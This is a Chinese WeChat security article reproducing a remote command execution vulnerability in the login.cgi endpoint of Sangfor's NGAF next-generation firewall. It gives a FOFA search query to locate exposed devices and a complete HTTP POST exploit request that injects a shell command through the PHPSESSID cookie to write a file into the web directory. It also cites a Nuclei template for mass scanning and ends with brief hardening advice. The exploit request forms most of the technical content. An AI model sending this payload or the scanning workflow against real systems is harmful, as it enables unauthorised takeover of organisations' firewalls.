点击上方蓝字关注我们
BEGINNING OF SPRING
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送文章,敬请大家动动手指设置“星标”,完成之后可以第一时间收到推送啦。
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
公众号发表的一切文章如有侵权烦请私信联系告知,我们会立即删除并对您表达最诚挚的歉意!感谢您的理解!
0x02
漏洞概述
Vulnerability Overview
某某服科技股份有限公司是一家专注于企业级网络安全、云计算、IT基础设施与物联网的产品和服务供应商,拥有智安全、信服云两大业务品牌,致力于承载各行业用户数字化转型过程中的基石性工作,从而让每个用户的数字化更简单、更安全。
某某服下一代防火墙(Next-Generation Application Firewall)NGAF的 login.cgi接口存在远程执行命令漏洞,未经授权的攻击者通过漏洞可以浏览任意文件,获取服务器权限。
(文章仅限技术交流,禁止非授权操作!)
0x03
漏洞复现
Vulnerability Recurrence
fofa:title="app="SANGFOR-防火墙类产品""
1.执行如下语句上传txt文档,并访问该txt文件。
POST /cgi-bin/login.cgi HTTP/1.1
Host: {Hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 112
Content-Type: Application/X-www-Form
Cookie: PHPSESSID=`$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`;
Accept-Encoding: gzip
{"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}
其中Hostname为目标漏洞平台的实际地址或域名
2.访问/svpn_html/qwer.txt路径,得到内容“敏感信息”
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t sangfor-ngaf-login-rce.yaml -l sangfor-ngaf-login-rce_Subs.txt
--------------------------------------------
sangfor-ngaf-login-rce_Subs.txt可以结合实际情况自定义
--------------------------------------------
2.空间指纹截图如下:
3.关注公众号回复:NGAF,获取脚本。
(文章仅限技术交流,禁止非授权操作!)
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
点亮「星标」,让我们不再错过~
2023-10-11
漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞
2023-09-20
漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞
2023-08-15
PHPMyadmin的Getshell方法汇总
2023-07-01
漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞
2023-06-19
END
原文始发于微信公众号(数字人才创研院):漏洞复现|某服下一代防火墙NGAF存在远程命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论